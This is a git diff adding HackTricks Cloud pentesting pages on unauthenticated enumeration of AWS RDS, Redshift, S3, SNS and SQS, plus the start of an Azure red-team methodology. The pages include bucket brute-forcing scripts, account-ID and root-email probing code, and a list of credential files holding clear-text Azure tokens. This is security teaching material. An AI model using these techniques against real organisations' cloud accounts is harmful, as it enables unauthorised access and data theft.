+It's possible to **expose the Kafka broker to the public**, but you will need **credentials**, IAM permissions or a valid certificate (depending on the auth method configured).
+
+It's also **possible to disabled authentication**, but in that case **it's not possible to directly expose** the port to the Internet.
+
+### Public URL template
+
+```
+b-{1,2,3,4}.{user_provided}.{random_id}.c{1,2}.kafka.{region}.amazonaws.com
+{user_provided}.{random_id}.c{1,2}.kafka.useast-1.amazonaws.com
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md
new file mode 100644
index 0000000000..fa2b1ba730
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md
@@ -0,0 +1,70 @@
+# AWS - RDS Unauthenticated Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## RDS
+
+For more information check:
+
+{% content-ref url="../aws-services/aws-relational-database-rds-enum.md" %}
+[aws-relational-database-rds-enum.md](../aws-services/aws-relational-database-rds-enum.md)
+{% endcontent-ref %}
+
+## Public Port
+
+It's possible to give public access to the **database from the internet**. The attacker will still need to **know the username and password,** IAM access, or an **exploit** to enter in the database.
+
+## Public RDS Snapshots
+
+AWS allows giving **access to anyone to download RDS snapshots**. You can list these public RDS snapshots very easily from your own account:
+
+```bash
+# Public RDS snapshots
+aws rds describe-db-snapshots --include-public
+
+## Search by account ID
+aws rds describe-db-snapshots --include-public --query 'DBSnapshots[?contains(DBSnapshotIdentifier, `284546856933:`) == `true`]'
+## To share a RDS snapshot with everybody the RDS DB cannot be encrypted (so the snapshot won't be encryted)
+## To share a RDS encrypted snapshot you need to share the KMS key also with the account
+
+
+# From the own account you can check if there is any public snapshot with:
+aws rds describe-db-snapshots --snapshot-type public [--region us-west-2]
+## Even if in the console appear as there are public snapshot it might be public
+## snapshots from other accounts used by the current account
+```
+
+### Public URL template
+
+```
+mysql://{user_provided}.{random_id}.{region}.rds.amazonaws.com:3306
+postgres://{user_provided}.{random_id}.{region}.rds.amazonaws.com:5432
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md
new file mode 100644
index 0000000000..a6e2a448ae
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md
@@ -0,0 +1,37 @@
+# AWS - Redshift Unauthenticated Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+### Public URL template
+
+```
+{user_provided}.<random>.<region>.redshift.amazonaws.com
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md
new file mode 100644
index 0000000000..ec6530ee85
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md
@@ -0,0 +1,228 @@
+# AWS - S3 Unauthenticated Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## S3 Public Buckets
+
+A bucket is considered **“public”** if **any user can list the contents** of the bucket, and **“private”** if the bucket's contents can **only be listed or written by certain users**.
+
+Companies might have **buckets permissions miss-configured** giving access either to everything or to everyone authenticated in AWS in any account (so to anyone). Note, that even with such misconfigurations some actions might not be able to be performed as buckets might have their own access control lists (ACLs).
+
+**Learn about AWS-S3 misconfiguration here:** [**http://flaws.cloud**](http://flaws.cloud/) **and** [**http://flaws2.cloud/**](http://flaws2.cloud)
+
+### Finding AWS Buckets
+
+Different methods to find when a webpage is using AWS to storage some resources:
+
+#### Enumeration & OSINT:
+
+* Using **wappalyzer** browser plugin
+* Using burp (**spidering** the web) or by manually navigating through the page all **resources** **loaded** will be save in the History.
+*   **Check for resources** in domains like:
+
+    ```
+    http://s3.amazonaws.com/[bucket_name]/
+    http://[bucket_name].s3.amazonaws.com/
+    ```
+* Check for **CNAMES** as `resources.domain.com` might have the CNAME `bucket.s3.amazonaws.com`
+* Check [https://buckets.grayhatwarfare.com](https://buckets.grayhatwarfare.com/), a web with already **discovered open buckets**.
+* The **bucket name** and the **bucket domain name** needs to be **the same.**
+  * **flaws.cloud** is in **IP** 52.92.181.107 and if you go there it redirects you to [https://aws.amazon.com/s3/](https://aws.amazon.com/s3/). Also, `dig -x 52.92.181.107` gives `s3-website-us-west-2.amazonaws.com`.
+  * To check it's a bucket you can also **visit** [https://flaws.cloud.s3.amazonaws.com/](https://flaws.cloud.s3.amazonaws.com/).
+
+#### Brute-Force
+
+You can find buckets by **brute-forcing name**s related to the company you are pentesting:
+
+* [https://github.com/sa7mon/S3Scanner](https://github.com/sa7mon/S3Scanner)
+* [https://github.com/clario-tech/s3-inspector](https://github.com/clario-tech/s3-inspector)
+* [https://github.com/jordanpotti/AWSBucketDump](https://github.com/jordanpotti/AWSBucketDump) (Contains a list with potential bucket names)
+* [https://github.com/fellchase/flumberboozle/tree/master/flumberbuckets](https://github.com/fellchase/flumberboozle/tree/master/flumberbuckets)
+* [https://github.com/smaranchand/bucky](https://github.com/smaranchand/bucky)
+* [https://github.com/tomdev/teh\_s3\_bucketeers](https://github.com/tomdev/teh_s3_bucketeers)
+* [https://github.com/RhinoSecurityLabs/Security-Research/tree/master/tools/aws-pentest-tools/s3](https://github.com/RhinoSecurityLabs/Security-Research/tree/master/tools/aws-pentest-tools/s3)
+* [https://github.com/Eilonh/s3crets\_scanner](https://github.com/Eilonh/s3crets_scanner)
+* [https://github.com/belane/CloudHunter](https://github.com/belane/CloudHunter)
+
+<pre class="language-bash"><code class="lang-bash"># Generate a wordlist to create permutations
+curl -s https://raw.githubusercontent.com/cujanovic/goaltdns/master/words.txt > /tmp/words-s3.txt.temp
+curl -s https://raw.githubusercontent.com/jordanpotti/AWSBucketDump/master/BucketNames.txt >>/tmp/words-s3.txt.temp
+cat /tmp/words-s3.txt.temp | sort -u > /tmp/words-s3.txt
+
+# Generate a wordlist based on the domains and subdomains to test
+## Write those domains and subdomains in subdomains.txt
+cat subdomains.txt > /tmp/words-hosts-s3.txt
+cat subdomains.txt | tr "." "-" >> /tmp/words-hosts-s3.txt
+cat subdomains.txt | tr "." "\n" | sort -u >> /tmp/words-hosts-s3.txt
+
+# Create permutations based in a list with the domains and subdomains to attack
+goaltdns -l /tmp/words-hosts-s3.txt -w /tmp/words-s3.txt -o /tmp/final-words-s3.txt.temp
+## The previous tool is specialized increating permutations for subdomains, lets filter that list
+<strong>### Remove lines ending with "."
+</strong>cat /tmp/final-words-s3.txt.temp | grep -Ev "\.$" > /tmp/final-words-s3.txt.temp2
+### Create list without TLD
+cat /tmp/final-words-s3.txt.temp2 | sed -E 's/\.[a-zA-Z0-9]+$//' > /tmp/final-words-s3.txt.temp3
+### Create list without dots
+cat /tmp/final-words-s3.txt.temp3 | tr -d "." > /tmp/final-words-s3.txt.temp4http://phantom.s3.amazonaws.com/
+### Create list without hyphens
+cat /tmp/final-words-s3.txt.temp3 | tr "." "-" > /tmp/final-words-s3.txt.temp5
+
+## Generate the final wordlist
+cat /tmp/final-words-s3.txt.temp2 /tmp/final-words-s3.txt.temp3 /tmp/final-words-s3.txt.temp4 /tmp/final-words-s3.txt.temp5 | grep -v -- "-\." | awk '{print tolower($0)}' | sort -u > /tmp/final-words-s3.txt
+
+## Call s3scanner
+s3scanner --threads 100 scan --buckets-file /tmp/final-words-s3.txt  | grep bucket_exists
+</code></pre>
+
+#### Loot S3 Buckets
+
+Given S3 open buckets, [**BucketLoot**](https://github.com/redhuntlabs/BucketLoot) can automatically **search for interesting information**.
+
+### Find the Region
+
+You can find all the supported regions by AWS in [**https://docs.aws.amazon.com/general/latest/gr/s3.html**](https://docs.aws.amazon.com/general/latest/gr/s3.html)
+
+#### By DNS
+
+You can get the region of a bucket with a **`dig`** and **`nslookup`** by doing a **DNS request of the discovered IP**:
+
+```bash
+dig flaws.cloud
+;; ANSWER SECTION:
+flaws.cloud.    5    IN    A    52.218.192.11
+
+nslookup 52.218.192.11
+Non-authoritative answer:
+11.192.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com.
+```
+
+Check that the resolved domain have the word "website".\
+You can access the static website going to: `flaws.cloud.s3-website-us-west-2.amazonaws.com`\
+or you can access the bucket visiting: `flaws.cloud.s3-us-west-2.amazonaws.com`
+
+#### By Trying
+
+If you try to access a bucket, but in the **domain name you specify another region** (for example the bucket is in `bucket.s3.amazonaws.com` but you try to access `bucket.s3-website-us-west-2.amazonaws.com`, then you will be **indicated to the correct location**:
+
+![](<../../../.gitbook/assets/image (106).png>)
+
+### Enumerating the bucket
+
+To test the openness of the bucket a user can just enter the URL in their web browser. A private bucket will respond with "Access Denied". A public bucket will list the first 1,000 objects that have been stored.
+
+Open to everyone:
+
+![](<../../../.gitbook/assets/image (201).png>)
+
+Private:
+
+![](<../../../.gitbook/assets/image (83).png>)
+
+You can also check this with the cli:
+
+```bash
+#Use --no-sign-request for check Everyones permissions
+#Use --profile <PROFILE_NAME> to indicate the AWS profile(keys) that youwant to use: Check for "Any Authenticated AWS User" permissions
+#--recursive if you want list recursivelyls 
+#Opcionally you can select the region if you now it
+aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile <PROFILE_NAME>] [ --recursive] [--region us-west-2]
+```
+
+If the bucket doesn't have a domain name, when trying to enumerate it, **only put the bucket name** and not the whole AWSs3 domain. Example: `s3://<BUCKETNAME>`
+
+### Public URL template
+
+```
+https://{user_provided}.s3.amazonaws.com
+```
+
+### Get Account ID from public Bucket
+
+It's possible to determine an AWS account by taking advantage of the new **`S3:ResourceAccount`** **Policy Condition Key**. This condition **restricts access based on the S3 bucket** an account is in (other account-based policies restrict based on the account the requesting principal is in).\
+And because the policy can contain **wildcards** it's possible to find the account number **just one number at a time**.
+
+This tool automates the process:
+
+```bash
+# Installation
+pipx install s3-account-search
+pip install s3-account-search
+# With a bucket
+s3-account-search arn:aws:iam::123456789012:role/s3_read s3://my-bucket
+# With an object
+s3-account-search arn:aws:iam::123456789012:role/s3_read s3://my-bucket/path/to/object.ext
+```
+
+This technique also works with API Gateway URLs, Lambda URLs, Data Exchange data sets and even to get the value of tags (if you know the tag key). You can find more information in the [**original research**](https://blog.plerion.com/conditional-love-for-aws-metadata-enumeration/) and the tool [**conditional-love**](https://github.com/plerionhq/conditional-love/) to automate this exploitation.
+
+### Confirming a bucket belongs to an AWS account
+
+As explained in [**this blog post**](https://blog.plerion.com/things-you-wish-you-didnt-need-to-know-about-s3/)**, if you have permissions to list a bucket** it’s possible to confirm an accountID the bucket belongs to by sending a request like:
+
+```bash
+curl -X GET "[bucketname].amazonaws.com/" \
+-H "x-amz-expected-bucket-owner: [correct-account-id]"
+
+<?xml version="1.0" encoding="UTF-8"?>
+<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">...</ListBucketResult>
+```
+
+If the error is an “Access Denied” it means that the account ID was wrong.
+
+### Used Emails as root account enumeration
+
+As explained in [**this blog post**](https://blog.plerion.com/things-you-wish-you-didnt-need-to-know-about-s3/), it's possible to check if an email address is related to any AWS account by **trying to grant an email permissions** over a S3 bucket via ACLs. If this doesn't trigger an error, it means that the email is a root user of some AWS account:
+
+```python
+s3_client.put_bucket_acl(
+    Bucket=bucket_name,
+    AccessControlPolicy={
+        'Grants': [
+            {
+                'Grantee': {
+                    'EmailAddress': 'some@emailtotest.com',
+                    'Type': 'AmazonCustomerByEmail',
+                },
+                'Permission': 'READ'
+            },
+        ],
+        'Owner': {
+            'DisplayName': 'Whatever',
+            'ID': 'c3d78ab5093a9ab8a5184de715d409c2ab5a0e2da66f08c2f6cc5c0bdeadbeef'
+        }
+    }
+)
+```
+
+## References
+
+* [https://www.youtube.com/watch?v=8ZXRw4Ry3mQ](https://www.youtube.com/watch?v=8ZXRw4Ry3mQ)
+* [https://cloudar.be/awsblog/finding-the-account-id-of-any-public-s3-bucket/](https://cloudar.be/awsblog/finding-the-account-id-of-any-public-s3-bucket/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md
new file mode 100644
index 0000000000..416a48e0e0
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md
@@ -0,0 +1,47 @@
+# AWS - SNS Unauthenticated Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## SNS
+
+For more information about SNS check:
+
+{% content-ref url="../aws-services/aws-sns-enum.md" %}
+[aws-sns-enum.md](../aws-services/aws-sns-enum.md)
+{% endcontent-ref %}
+
+### Open to All
+
+When you configure a SNS topic from the web console it's possible to indicate that **Everyone can publish and subscribe** to the topic:
+
+<figure><img src="../../../.gitbook/assets/image (212).png" alt=""><figcaption></figcaption></figure>
+
+So if you **find the ARN of topics** inside the account (or brute forcing potential names for topics) you can **check** if you can **publish** or **subscribe** to **them**.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md
new file mode 100644
index 0000000000..5926225b3e
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md
@@ -0,0 +1,49 @@
+# AWS - SQS Unauthenticated Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## SQS
+
+For more information about SQS check:
+
+{% content-ref url="../aws-services/aws-sqs-and-sns-enum.md" %}
+[aws-sqs-and-sns-enum.md](../aws-services/aws-sqs-and-sns-enum.md)
+{% endcontent-ref %}
+
+### Public URL template
+
+```
+https://sqs.[region].amazonaws.com/[account-id]/{user_provided}
+```
+
+### Check Permissions
+
+It's possible to misconfigure a SQS queue policy and grant permissions to everyone in AWS to send and receive messages, so if you get the ARN of queues try if you can access them.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/README.md b/pentesting-cloud/azure-security/README.md
new file mode 100644
index 0000000000..02a5e08569
--- /dev/null
+++ b/pentesting-cloud/azure-security/README.md
@@ -0,0 +1,423 @@
+# Azure Pentesting
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+{% content-ref url="az-basic-information/" %}
+[az-basic-information](az-basic-information/)
+{% endcontent-ref %}
+
+## Azure Pentester/Red Team Methodology
+
+In order to audit an AZURE environment it's very important to know: which **services are being used**, what is **being exposed**, who has **access** to what, and how are internal Azure services and **external services** connected.
+
+From a Red Team point of view, the **first step to compromise an Azure environment** is to manage to obtain some **credentials** for Azure AD. Here you have some ideas on how to do that:
+
+* **Leaks** in github (or similar) - OSINT
+* **Social** Engineering
+* **Password** reuse (password leaks)
+* Vulnerabilities in Azure-Hosted Applications
+  * [**Server Side Request Forgery**](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf) with access to metadata endpoint
+  * **Local File Read**
+    * `/home/USERNAME/.azure`
+    * `C:\Users\USERNAME\.azure`
+    * The file **`accessTokens.json`** in `az cli` before 2.30 - Jan2022 - stored **access tokens in clear text**
+    * The file **`azureProfile.json`** contains **info** about logged user.
+    * **`az logout`** removes the token.
+    * Older versions of **`Az PowerShell`** stored **access tokens** in **clear** text in **`TokenCache.dat`**. It also stores **ServicePrincipalSecret** in **clear**-text in **`AzureRmContext.json`**. The cmdlet **`Save-AzContext`** can be used to **store** **tokens**.\
+      Use `Disconnect-AzAccount` to remove them.
+* 3rd parties **breached**
+* **Internal** Employee
+* [**Common Phishing**](https://book.hacktricks.xyz/generic-methodologies-and-resources/phishing-methodology) (credentials or Oauth App)
+  * [Device Code Authentication Phishing](az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md)
+* [Azure **Password Spraying**](az-unauthenticated-enum-and-initial-entry/az-password-spraying.md)
+
+Even if you **haven't compromised any user** inside the Azure tenant you are attacking, you can **gather some information** from it:
+
+{% content-ref url="az-unauthenticated-enum-and-initial-entry/" %}
+[az-unauthenticated-enum-and-initial-entry](az-unauthenticated-enum-and-initial-entry/)
+{% endcontent-ref %}
+
+{% hint style="info" %}
+After you have managed to obtain credentials, you need to know **to who do those creds belong**, and **what they have access to**, so you need to perform some basic enumeration:
+{% endhint %}
+
+## Basic Enumeration
+
+{% hint style="info" %}
+Remember that the **noisiest** part of the enumeration is the **login**, not the enumeration itself.
+{% endhint %}
+
